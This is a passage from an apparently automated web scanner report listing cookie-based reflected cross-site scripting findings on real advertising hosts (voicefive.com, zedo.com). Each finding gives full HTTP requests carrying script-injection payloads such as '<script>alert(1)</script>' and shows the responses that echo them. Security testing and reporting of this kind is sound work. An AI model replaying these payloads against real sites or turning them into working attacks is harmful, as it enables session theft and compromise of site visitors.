739&arc=40422016&', "BMX_G": 'method->-1,ts->1304954985', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&e561b<script>alert(1)</script>97681a38a8f', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

2.152. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload 1f282<script>alert(1)</script>608567be610 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&1f282<script>alert(1)</script>608567be610; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&1f282<script>alert(1)</script>608567be610', "BMX_3PC": '1', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&rec
...[SNIP]...

2.153. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 3242f<script>alert(1)</script>964b49411c1 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&3242f<script>alert(1)</script>964b49411c1; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&3242f<script>alert(1)</script>964b49411c1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

2.154. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 6cd03<script>alert(1)</script>1bad017a894 was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&6cd03<script>alert(1)</script>1bad017a894; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
1&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '1', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&6cd03<script>alert(1)</script>1bad017a894', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

2.155. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 601d2<script>alert(1)</script>02d3d14ba53 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&601d2<script>alert(1)</script>02d3d14ba53; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&601d2<script>alert(1)</script>02d3d14ba53=&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&601d2<script>alert(1)</script>02d3d14ba53', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "BMX_G": 'method->
...[SNIP]...

2.156. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 4341e<script>alert(1)</script>faac9635f42 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=14341e<script>alert(1)</script>faac9635f42; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
5207&arc=178113566&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "BMX_G": 'method->-1,ts->1304954985', "ar_s_p81479006": '14341e<script>alert(1)</script>faac9635f42', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

2.157. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b78a"-alert(1)-"9b5e3cf9810 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~0423112b78a"-alert(1)-"9b5e3cf9810; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:12 GMT
Connection: close
Content-Length: 2010

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
AABN~0423112b78a"-alert(1)-"9b5e3cf9810';

var zzhasAd=undefined;


                                                                                                       var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~0423112b78a"-alert(1)-"9b5e3cf9810;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

2.158. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e3ff"-alert(1)-"a1e8393f137 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~0423111e3ff"-alert(1)-"a1e8393f137; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2052

